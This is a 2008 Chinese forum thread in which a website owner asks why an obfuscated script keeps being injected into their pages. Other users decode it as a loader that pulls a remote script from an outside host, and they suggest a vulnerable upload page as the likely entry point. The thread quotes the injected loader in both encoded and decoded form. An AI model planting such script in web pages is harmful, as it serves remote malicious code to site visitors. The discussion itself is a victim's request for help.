npngstudio 2008-3-6 13:35
网页被加入代码,是被挂马了吗?
前段时间网站的很多网页被加入了以下代码:
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
而且你把代码删除之后再改了所有密码 还是会被加上那些代码.现在随便复制中间的一段代码在百度搜下简直太多了,网站的说明全变成了那段代码,其中的原因真的搞不懂,希望得到高手的帮助,感激不尽!!!
[[i] 本帖最后由 npngstudio 于 2008-3-6 14:25 编辑 [/i]]
npngstudio 2008-3-6 14:19
现在没有了 上次清除代码后就一直没事 我害怕再出事 想知道原因在哪
[url]http://www.jiahaowenhua.com[/url]
icebug 2008-3-6 15:26
解密之后应该是这样的:
<script>document.writeln("<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>");</script>
fengxiaoxiao 2008-3-6 15:46
有点明白了
呵呵
好久没看代码了
npngstudio 2008-3-6 16:19
是网站有漏洞吗?还是服务器有漏洞?
icebug 2008-3-6 16:43
具体怎么做的我也不知道 能肯定的是网站被黑了
大多数情况是WEB的漏洞 也不排除服务器
npngstudio 2008-3-6 17:51
那就麻了烦了......唉
modernsky 2008-3-9 15:39
<script>document.writeln("<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>");</script>
这样看确实是被挂马了阿 你看看后台有什么漏洞没有 比如说upfile这样文件经常被人家利用
npngstudio 2008-3-10 15:36
[quote]原帖由 [i]modernsky[/i] 于 2008-3-9 15:39 发表 [url=http://www.sharecenter.net/redirect.php?goto=findpost&pid=2093789&ptid=204753][img]http://www.sharecenter.net/images/common/back.gif[/img][/url]
document.writeln("");
这样看确实是被挂马了阿 你看看后台有什么漏洞没有 比如说upfile这样文件经常被人家利用 [/quote]
怎么查看网站有没有漏洞?这方面我不是很懂,有具体的操作方法吗?
npngstudio 2008-3-13 13:37
今天又被加入代码了:mad: :mad: :mad: :mad:
